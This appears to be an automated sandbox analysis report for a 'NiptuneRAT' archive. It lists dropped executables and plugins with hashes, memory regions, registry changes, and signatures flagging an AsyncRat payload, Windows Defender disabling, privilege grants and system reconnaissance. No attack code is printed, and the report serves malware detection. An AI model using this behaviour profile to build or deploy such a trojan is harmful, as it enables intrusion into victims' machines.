C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe

MD5 a6bf33461f36b6cc60df311818e13f16
SHA1 a18d8aec012db8d2b247b618087c860e134c7a57
SHA256 7fb89d4f209ac6c6089783a2258a1b45d40686fb7624ad835263724e10477961
SHA512 7faad74edc9282f3410fd3edcc8bedd4cba28fbb768b5c24cafa761503c7408b394296e905739f0105b76cde4fa24512cb2ea5610f4637a25de19f1792766ac0

C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe.config

MD5 465c8716dc52edeaf09f0c61fc988934
SHA1 9cab6cec5f46d7528323fa2ad7aa2fc1a72d689b
SHA256 1c6051caeecdd3eeb78cad1b1efa60e56be4193d76f5718c73b8fdfcd61784c5
SHA512 0b386615940f254d6a7dd5650fc7da6544beab97d821bab8fe915dcc257729919142bbd6680b06a19f57c8c79c2c04368413fc31a7efef8e9248209f81c1cf3c

memory/3600-163-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/3600-164-0x00000189D49D0000-0x00000189D62FA000-memory.dmp

memory/3600-165-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/3600-166-0x00000189F07E0000-0x00000189F0A32000-memory.dmp

memory/3600-167-0x00000189F0E50000-0x00000189F1044000-memory.dmp

memory/3600-168-0x00000189F1400000-0x00000189F154E000-memory.dmp

memory/3600-169-0x00000189F1590000-0x00000189F15A4000-memory.dmp

memory/3600-170-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/3600-171-0x00000189FAB20000-0x00000189FB108000-memory.dmp

memory/3600-172-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/3600-173-0x00000189FA310000-0x00000189FA31A000-memory.dmp

memory/3600-174-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/3600-175-0x00000189F1A30000-0x00000189F1A42000-memory.dmp

memory/3600-176-0x00000189F1A50000-0x00000189F1CD0000-memory.dmp

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe

MD5 89974f21c462ad66165c03cc05a9b8a7
SHA1 868b45d89fced9bf5cdc3e86e8eeb0698262deb4
SHA256 9f61591699d7d9e3336bbe924e7826c1e8bedb7227045705d50eec264b1202ec
SHA512 7348faa61700741733da0b80fdb824366a7cb7d841c24d78d54971ba1d0fbe899f257f0c68792db5c1e05ca3afb4e6fbd251f8d369c903e227e9b7eba4f861b3

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe.config

MD5 0c02012f18e2755ce1bfaa8c81abe14e
SHA1 b10ef760340682f09360019ddca35a2bc0eef3e1
SHA256 93b3433679ee8d782f69e37136e207bd5e125f1ef79542bf9d7e84c1c84feea5
SHA512 c1ad192d040288433b5a618720de46199c94c71b17c8365a16aa7180179c7efbc8ff77e590c1dcfc1e8d6caa1223446b9458663f5dc7ccd861ee3afb6bc99787

memory/3600-190-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/4896-191-0x0000027CF7410000-0x0000027CF74E6000-memory.dmp

memory/4896-195-0x0000027CF9210000-0x0000027CF9230000-memory.dmp

memory/4896-196-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/4896-198-0x0000027CF9230000-0x0000027CF9250000-memory.dmp

memory/3600-201-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/4896-200-0x0000027CF9AF0000-0x0000027CF9B0E000-memory.dmp

memory/4896-204-0x0000027CF9C80000-0x0000027CF9CEE000-memory.dmp

memory/4896-206-0x0000027CF9F10000-0x0000027CFA124000-memory.dmp

memory/4896-202-0x0000027CF9AE0000-0x0000027CF9AF0000-memory.dmp

memory/4896-208-0x0000027CFA360000-0x0000027CFA3BA000-memory.dmp

memory/4896-210-0x0000027CFA310000-0x0000027CFA31E000-memory.dmp

memory/4896-213-0x0000027CFB100000-0x0000027CFB24A000-memory.dmp

memory/4896-214-0x0000027CFAFB0000-0x0000027CFB0C6000-memory.dmp

memory/4896-215-0x0000027CF9AB0000-0x0000027CF9AE0000-memory.dmp

memory/3600-217-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/4896-218-0x0000027CF9AE0000-0x0000027CF9AF0000-memory.dmp

memory/4896-219-0x0000027CF9AE0000-0x0000027CF9AF0000-memory.dmp

memory/3600-220-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/4896-222-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/3600-223-0x00000189D8030000-0x00000189D8040000-memory.dmp

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe

MD5 ab9b9dac5c176d3f525400aa7b58a078
SHA1 c7b22490b94d46ed0287c4b6ece08e96e7103516
SHA256 6d9da9ac899fdac6a9436922be389ef3bd124f4657fea6332c2ccd3fc33613d4
SHA512 649032f0046778fa63e7878ade222de7a061162b6da4670970ace517d2c2212f80dff2fd5a5f2d9c25324a89c5af0927022c1ec24f726da92a669cd232b8ec16

memory/1560-226-0x00007FFD6B680000-0x00007FFD6C021000-memory.dmp

memory/1560-227-0x0000000000F80000-0x0000000000F90000-memory.dmp

memory/1560-228-0x000000001BC10000-0x000000001C0DE000-memory.dmp

memory/1560-229-0x00007FFD6B680000-0x00007FFD6C021000-memory.dmp

memory/1560-230-0x000000001B5F0000-0x000000001B68C000-memory.dmp

memory/1560-231-0x0000000000FD0000-0x0000000000FD8000-memory.dmp

memory/1560-232-0x0000000000F80000-0x0000000000F90000-memory.dmp

memory/1560-234-0x0000000000F80000-0x0000000000F90000-memory.dmp

memory/1560-235-0x00007FFD6B680000-0x00007FFD6C021000-memory.dmp

memory/3600-236-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/3600-237-0x00000189FE3B0000-0x00000189FE4CE000-memory.dmp

C:\Users\Admin\Desktop\NiptuneRAT-main\Stub\Stub.exe

MD5 0da861f192f8e722505826c141c05a40
SHA1 4d717f9d2a64caf68374ed1e246cf38dd208227b
SHA256 4c6a73271e3a0794bff16fa39b45771e9e39b873e12fdc7031e03fbda238667b
SHA512 7b61ac15ba95e0b8a9ebac2f33e7137083b18204de503e7a2946af65e9d5b6ad9e826a27770e10862dc825f3e20e8bd72463593528a623c4603f9628f8c27280

C:\Users\Admin\Desktop\NiptuneRAT-main\Usrs.p12

MD5 87f8c46f0f27b967b543ab554c061dbd
SHA1 78c88f30a8c3638b9c61d4c8044a9e4f8d7b00d3
SHA256 adf158702858e96c9003d5ab5115c6a1e71cdce8a82377e0d6c6e63edfb52239
SHA512 b289e2cf36684dad0f47cacd8716582e176ad71720f7a00fc508ec6eeb0266cdfcf58c7c62cddf4e0a03dc0fbe60e3a9c76da820eccf73f8c9a669252c17422c

C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\user.config

MD5 77d636e08fe9de62cf19ad656409ccde
SHA1 827de958d0c46346c9c581be646b8c3a61fab648
SHA256 4155b94bb3ef65ff1f15d7f337f2ada62d474ec5ba7557562618e5206e83a558
SHA512 60712d620a884d897457f56d4ecc758c9a753c31f58fcb9d814af58dbc2e105435c9a73f837b4146e2e8edb7834b83f51dcecaaf39cd6f69be59d7bb5c28b839

C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\user.config

MD5 67ae3b067855a1e16f01e16ee389c8f0
SHA1 3bef83c7922cda26497a45bbfe209e65b14234a0
SHA256 07e9e4841eeace951264cf7b4cf5e8c6993fc923b851cb2360122fe7fec2ef0a
SHA512 db73d3a4a9523db12264d1cf53e50d44589af8dc83bdbb041eff8977f6134666d1836014ebde472039036a13beabe6adee026712f385453ed654ae5ac504e699

C:\Users\Admin\Desktop\$77NiptuneClient.exe

MD5 9a545e9134023055aa55309e62f77a80
SHA1 8f663c9816f8610676f4fc101cb6f31c21117d47
SHA256 75bbbbeca7b8b6831e6bd91b7b7256c30a50de3369965f1866434a924f4c362e
SHA512 d5d4dd237a03218d7c95f14160151e41adb89dd26192114efd9cc2b915e5fc006f2f4e2bf859c6cc1246f0584aa5f344d6b9525f3d31650719e8d4b66d838526

memory/2396-272-0x0000000000510000-0x0000000000526000-memory.dmp

memory/3600-273-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/2396-274-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/2396-275-0x000000001B2F0000-0x000000001B300000-memory.dmp

memory/2396-276-0x00007FFD948D0000-0x00007FFD94AC5000-memory.dmp

memory/2396-281-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/2396-282-0x00007FFD948D0000-0x00007FFD94AC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpD3B1.tmp.bat

MD5 7352cc373f53964e85cee69d5e6a96d5
SHA1 267c8a9098dd1d4842f052126ea14b1f7fc8c973
SHA256 4397f51ac52f558c35fa9181fe7519cdef892bf26d99af375fff5f50cdaaa346
SHA512 78826b32baa2c2c5eec0ffbe3f0c65dfc5cf9b270f4ce0174bda794a2c881858fd1ee0a7fba10af952ee3e14609095c2b24046dc6575de9dcddf513d4e4d2c73

memory/3304-284-0x0000025878860000-0x0000025878882000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nm1hmjww.bcx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3304-294-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/3304-295-0x00000258787E0000-0x00000258787F0000-memory.dmp

memory/3304-296-0x00000258787E0000-0x00000258787F0000-memory.dmp

memory/3304-297-0x0000025879020000-0x00000258791E2000-memory.dmp

memory/2320-308-0x0000017424DB0000-0x0000017424DC0000-memory.dmp

memory/2320-309-0x0000017424DB0000-0x0000017424DC0000-memory.dmp

memory/2320-307-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/2320-310-0x0000017425C40000-0x0000017426168000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE

MD5 0ccb78c036b77af2a02939c10863d0fc
SHA1 77b58cc239c67abf271a7e68c10592a8a4d5bae1
SHA256 555e0c40af959eb3c9be32197ebf39aea443fe672086e004cc0141296de67d7a
SHA512 29f194f6118f558a31515538d758934d59959a9aeed1a2ae9e929b762166843a4433b10b0f5ded0698c141d36fc12ae54860ecbb8d36ba6ca2f92cb946f39a5c

memory/2320-324-0x00000174250C0000-0x000001742520E000-memory.dmp

memory/4656-325-0x0000000000840000-0x0000000000874000-memory.dmp

memory/2320-326-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f62a904508f640cf7a29c69cdda7ed8e
SHA1 79e4bd22e96aa94c783f5521b5b2a549c58ed24f
SHA256 1c68a8d5fb2a3d57a9eaeb1e64cc457f3f4e268a54cbf8aeaf5084fd401e59bc
SHA512 0a5bdaf832544123470af0204145dc38830dbbf0e8b6623b89bbaca5970e5c0506356e4ad9d9a589bd3394768ff949215c3fea2d2542da16ffb60708c0f2c544

memory/3304-334-0x0000025878990000-0x0000025878ADE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 12b1823a0956e972f95e397d4ca5a91f
SHA1 1ad092456da4540400fd58788bc40a353b17e295
SHA256 0096655234a74760fbeb882149ad2513be4c9782e1e8ca86968e61b9f88c5230
SHA512 1bd8aa4179650510689ec523492c2327a61095c28266548d89512bc69b5b9b8416023e957a1ddfeefb51de2d403f525ee0535f850147b022568c44197fbcbcde

C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe

MD5 152e3f07bbaf88fb8b097ba05a60df6e
SHA1 c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256 a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA512 2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE

MD5 39b931afd01be1f696c515a83b789445
SHA1 790083c555276c9cca5bf7a9532fd99f79b80a90
SHA256 e9db26ffe8f05c133a7c541ccd7eafa63b64806a84e4e5866fc735e5dc4ab93d
SHA512 0961ea8fa2b23f2c2631db074a2271d37bec1844496796ec116c649245423b7e7da29b9a626c3c6406a65f9812550f09f089babee9fe805dcf311f6d7bda9592

memory/4936-376-0x00007FFD948D0000-0x00007FFD94AC5000-memory.dmp

memory/4936-377-0x00007FFD93D10000-0x00007FFD93DCE000-memory.dmp

memory/3728-382-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3728-384-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3728-380-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3728-379-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3728-378-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3728-385-0x00007FFD948D0000-0x00007FFD94AC5000-memory.dmp

memory/3728-387-0x00007FFD93D10000-0x00007FFD93DCE000-memory.dmp

memory/4936-389-0x000001BEFBB50000-0x000001BEFBC9E000-memory.dmp

memory/3728-390-0x0000000140000000-0x0000000140008000-memory.dmp

memory/620-393-0x0000024140D40000-0x0000024140D65000-memory.dmp

memory/620-395-0x0000024140D70000-0x0000024140D9B000-memory.dmp

memory/620-396-0x0000024140D70000-0x0000024140D9B000-memory.dmp

memory/620-405-0x00007FFD54950000-0x00007FFD54960000-memory.dmp

memory/620-404-0x0000024140D70000-0x0000024140D9B000-memory.dmp

memory/676-411-0x000001D8F01B0000-0x000001D8F01DB000-memory.dmp

memory/952-422-0x000001A5D9FA0000-0x000001A5D9FCB000-memory.dmp

memory/676-431-0x000001D8F01B0000-0x000001D8F01DB000-memory.dmp

memory/388-430-0x000002A8F8180000-0x000002A8F81AB000-memory.dmp

memory/676-437-0x00007FFD54950000-0x00007FFD54960000-memory.dmp

memory/908-445-0x000001D4ED7B0000-0x000001D4ED7DB000-memory.dmp

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\G3nl0mDcABnDuZ.dll

MD5 97b8bec4c47286e333cc2bedacf7338e
SHA1 764bbd0307924b71ca89538b42996208d10c9b91
SHA256 060d467cbeb0a58696287c052f3dd9b3597331b1c812e3e2882d6c232f8511de
SHA512 a40970622a594533349e75fc2022314ba21f05fc82709d6eaba82f4a2bc343c960029ad2825cfc034ce82622722127d149993bff88982f02d6dd6b5b1fb60fbf

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\FBSyChwp.dll

MD5 0d41ccfaa8e7ef96248b8270d1a44d08
SHA1 6ee22bdb91d3a18e0b45b6590eb69bc9a0b02326
SHA256 0ea38d0d964815e2b84748a78bd5a829ae01586478e5f17b976f1ae763c8dec3
SHA512 a0f236f6dbeb1763fb1c198616de65b907a3a5edf7ed9435c2ad0b5826d84e9d2f25e96aba4e8b681ef495612cf0e04e929427a92d332164ace89e797bcb0e0e

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\EVa7gBMKoaHmLC.dll

MD5 64a3d908b8a5feff2bccfc67f3a67dbd
SHA1 a17d7e5fa57c99a067cac459cb507b625dac254e
SHA256 6ea1ae7ab496666c0117fc20e704bfb6104b13cfb0408073a09689f863fa64b1
SHA512 66374d720230799bea6ac6cfe3faadc37fd775a49d40c04facae1caf1ec658956bbda54ba75287d7128b19b97971bd933a64469da8e0884225c5a8d8b9423ccc

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Audio.dll

MD5 8105f5149e1fea72e27f0a1455d956bc
SHA1 6722d54df38b89284c3375efda3985155e6f5b8e
SHA256 9b73be7a27b5aa8cabf10c79a6e515db6b59962cad3945dada2eff57bb56bfdf
SHA512 4f1aaa81263bb17aa7b495cab056fd9b18058247df874866bd9cb6247f180989a0d549ce0b4595c7a636e4d6279e92004c4f159c30e8b381a1a51b9d54a84d10

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\59Zp7paEHDF7luJ.dll

MD5 86cbe0f36426982c534746743f4a4dfe
SHA1 04dd3bf828b36ae75bfda0edc67693b59801e9b5
SHA256 972261dfbdd76a5b99d2922a018c5c809ddb195c4f44312bb1da496c9c28df44
SHA512 1cd164585caa0c5f64e567d24f9e4f9c4a4f79fb1e8da83ef8a635d6ad5e2f6ebcf2c813371b4cd53ea94e0d36f8a04fa2b2acf3f35570ff57450d6503fc31a4

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\0guo3zbo66fqoG.dll

MD5 e4ebcf76ff80ef398d3ab77d577f4c08
SHA1 cb9e6b30a63d50ae87610f6855b64abfb25691d2
SHA256 9661b1abc9a3e95e591c49c3838a64a066a2ff3c6de08d8aa7b541c4a75cd8e5
SHA512 8f37cedd987dd14181fdfa861b8a95271868dac21aa9df80bd6daa831ae20f4b4965c8be3e36f32aa220bd37ded11a7568ae237c9c9641bb4fc087f6fe104b01

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 3e79e497a1c8dff282c0e281a8ac4238
SHA1 ca25ecd92033c4789f61dbbd0e782eac581a091c
SHA256 edadb040867aacdc83bad794bdd55232320bb00ee4957b2217da614b26f158ea
SHA512 98cff43d464e17f18f7252f80e3f1105f4f048f83895ddca2e72c0b77dbe406ec104939737841e71eeb005e4ac83f7b6fb3789b115e2b0d91d78662009fe33d6

Analysis: behavioral4

Detonation Overview

Submitted

2024-03-17 21:41

Reported

2024-03-17 21:52

Platform

win11-20240221-en

Max time kernel

440s

Max time network

454s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip

Signatures

AsyncRat

rat asyncrat

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Grants admin privileges

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\NodeSlot = "9" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "8" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\MRUListEx = ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\system32\OpenWith.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1 C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 C:\Windows\system32\OpenWith.exe N/A
